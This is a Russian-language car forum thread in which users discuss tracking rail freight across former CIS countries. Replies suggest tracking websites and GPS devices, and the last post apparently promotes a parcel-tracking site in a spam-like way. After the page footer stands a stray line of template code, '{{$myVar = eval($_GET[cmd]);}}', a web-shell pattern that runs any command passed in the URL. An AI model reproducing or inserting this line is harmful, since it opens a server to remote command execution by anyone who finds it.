+ Ответить в теме
Показано с 1 по 7 из 7

Тема: Отслеживание грузов


  1. #1
    Мимо проходил Левша is on a distinguished road Аватар для Левша
    Регистрация
    12.12.2018
    Откуда
    Россия
    Машина
    Ездит
    Сообщений
    90

    Отслеживание грузов

    Друзья, кто-нибудь сталкивался со следующей проблемой: при перевозке грузов железной дорогой по территории стран бывшего СНГ невозможно узнать, где же конкретно находится товар. РЖД таких данный не предоставляет, а нам иногда очень срочно нужно. Если есть опыт решения подобной проблемы, поделитесь, пожалуйста.

  2. #2
    Мимо проходил Kirillov is on a distinguished road Аватар для Kirillov
    Регистрация
    13.12.2018
    Машина
    Есть
    Сообщений
    78
    Что, серьезно РЖД не дает никакой информации? А она вообще обязана ее предоставлять или это нигде не прописано? Просто при доставке другими видами транспорта товар всегда можно отследить, поэтому меня это удивляет...

  3. #3
    Мимо проходил Нибелунг is on a distinguished road Аватар для Нибелунг
    Регистрация
    14.12.2018
    Откуда
    Самый лучший на Земле
    Сообщений
    68
    Ну, если я правильно помню, то железнодорожники в принципе не предоставляют информацию о том, где находится вагон с грузом. Так что поиском придется заниматься самостоятельно. Благо для этого есть специальные сервисы. Ну вот, например, присмотритесь к этому http://www.rail-locator.com/ Правда, я не знаю, сколько стоит подобная услуга, но если Вашей фирме сильно нужно, то не думаю, что это будет проблемой.

  4. #4
    A GPS не пробовали вешать на свой груз? Мне кажется, это более эффективное решение, чем попытки отследить его с помощью каких-то сервисов. Тем более, что датчик же многоразовый, один раз купили и используйте сколько нужно.

  5. #5
    Мимо проходил Medved is on a distinguished road Аватар для Medved
    Регистрация
    27.12.2018
    Откуда
    Россия
    Машина
    Гольф
    Сообщений
    42
    какая разница где вагон? Лишь бы вовремя пришел

  6. #6
    GTI-Racing Felhaghma is on a distinguished road Аватар для Felhaghma
    Регистрация
    23.10.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    482
    У них есть возможность отследить местонахождение товара на всех этапах транспортировки.

  7. #7
    Новичок Rusik23 is on a distinguished road Аватар для Rusik23
    Регистрация
    25.10.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    179
    Ну я думаю что там встроенные возможности такие есть. Но вообще конечно можно пользоваться и отдельными сервисами для этого всего. Ну как вариант сюда https://zeroparcels.com/ зайдите, посмотрите. Я лично ползуюсь этим сайтом уже не первый месяц, просто часто заказы делаю с других стран и поэтому удобно очень что можно вот так вот отслеживать в реальном времени, где находится моя посылка) А вы что думаете? ПОсмотрите, ознакомьтесь и поделитесь впечатлениями

+ Ответить в теме

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}